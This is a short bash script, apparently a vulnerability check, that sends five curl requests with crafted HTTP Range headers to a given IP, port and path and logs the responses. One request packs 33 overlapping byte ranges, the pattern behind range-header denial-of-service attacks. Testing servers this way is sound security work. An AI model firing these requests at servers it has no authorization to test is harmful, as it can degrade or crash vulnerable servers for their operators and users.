#!/bin/bash

CMDNAME=`basename $0`
OUTFILE=$2_httprangedos_$1.txt

if [ $# -ne 3 ]; then
        echo "Usage: $CMDNAME {ip} {port} {request path} " 1>&2
        exit 1
fi

echo -e "\r\n\r\n********* HTTP Range Dos 1  ********" > $OUTFILE 2>&1
echo -e "# curl -i -H \"Range: bytes=-10\" http://$1:$2$3" >> $OUTFILE 2>&1
curl -i -H "Range: bytes=-10" http://$1:$2$3 >> $OUTFILE 2>&1

echo -e "\r\n\r\n********* HTTP Range Dos 2  ********" >> $OUTFILE 2>&1
echo -e "# curl -i -H \"Range: bytes=0-1,1-2,2-3,3-4,4-5,5-6,6-7,7-8,8-9,9-10,10-11,11-12,12-13,13-14,14-15,15-16,16-17,17-18,18-19,19-20,20-21,21-22,22-23,23-24,24-25,25-26,26-27,27-28,28-29,29-30,30-31,31-32,32-33\" http://$1:$2$3">> $OUTFILE 2>&1
curl -i -H "Range: bytes=0-1,1-2,2-3,3-4,4-5,5-6,6-7,7-8,8-9,9-10,10-11,11-12,12-13,13-14,14-15,15-16,16-17,17-18,18-19,19-20,20-21,21-22,22-23,23-24,24-25,25-26,26-27,27-28,28-29,29-30,30-31,31-32,32-33" http://$1:$2$3 >> $OUTFILE 2>&1

echo -e "\r\n\r\n********* HTTP Range Dos 3  ********" >> $OUTFILE 2>&1
echo -e "# curl -i -H \"Range: bytes=0-\" http://$1:$2$3" >> $OUTFILE 2>&1
curl -i -H "Range: bytes=0-" http://$1:$2$3 >> $OUTFILE 2>&1

echo -e "\r\n\r\n********* HTTP Range Dos 4  ********" >> $OUTFILE 2>&1
echo -e "# curl -i -H \"Range: bytes=1000000-\" http://$1:$2$3" >> $OUTFILE 2>&1
curl -i -H "Range: bytes=1000000-" http://$1:$2$3 >> $OUTFILE 2>&1

echo -e "\r\n\r\n********* HTTP Range Dos 5  ********" >> $OUTFILE 2>&1
echo -e "# curl -i -H \"Range: bytes=0-,0-,0-\" http://$1:$2$3" >> $OUTFILE 2>&1
curl -i -H "Range: bytes=0-,0-,0-" http://$1:$2$3 >> $OUTFILE 2>&1

echo " **** HTTP check completed. ****"
exit 0
